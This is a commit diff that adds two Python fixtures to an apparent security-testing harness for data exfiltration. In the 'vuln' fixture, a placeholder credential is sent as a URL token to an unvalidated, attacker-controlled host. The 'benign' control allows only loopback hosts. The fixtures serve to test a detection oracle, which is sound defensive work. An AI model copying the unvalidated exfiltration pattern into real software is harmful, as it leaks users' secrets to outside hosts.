Dynamic (#77)

2026-06-12 19:55:14 +02:00 · 2026-06-05 10:16:30 -05:00 · 2026-06-05 10:16:30 -05:00 · 991c84a1eb
commit 991c84a1eb
parent 55247b7fcd
1464 changed files with 225448 additions and 1985 deletions
--- a/tests/dynamic_fixtures/data_exfil/python/benign.py
+++ b/tests/dynamic_fixtures/data_exfil/python/benign.py
@ -0,0 +1,15 @@
+# Phase 11 (Track J.9) — Python DATA_EXFIL benign control fixture.
+#
+# Sends to a loopback receiver, so the captured host is on-allowlist
+# and the predicate stays clear.
+import urllib.request
+
+ALLOWLIST = {"127.0.0.1", "localhost"}
+
+
+def run(host):
+    if host not in ALLOWLIST:
+        return
+    secret = "alice-creds"
+    url = f"http://{host}/exfil?token={secret}"
+    urllib.request.urlopen(url, timeout=1)
--- a/tests/dynamic_fixtures/data_exfil/python/vuln.py
+++ b/tests/dynamic_fixtures/data_exfil/python/vuln.py
@ -0,0 +1,12 @@
+# Phase 11 (Track J.9) — Python DATA_EXFIL vuln fixture.
+#
+# Sends a captured secret to an attacker-controlled host without
+# host validation; the harness's mock HTTP client records the
+# outbound `host` and the `OutboundHostNotIn` oracle fires.
+import urllib.request
+
+
+def run(host):
+    secret = "alice-creds"
+    url = f"http://{host}/exfil?token={secret}"
+    urllib.request.urlopen(url, timeout=1)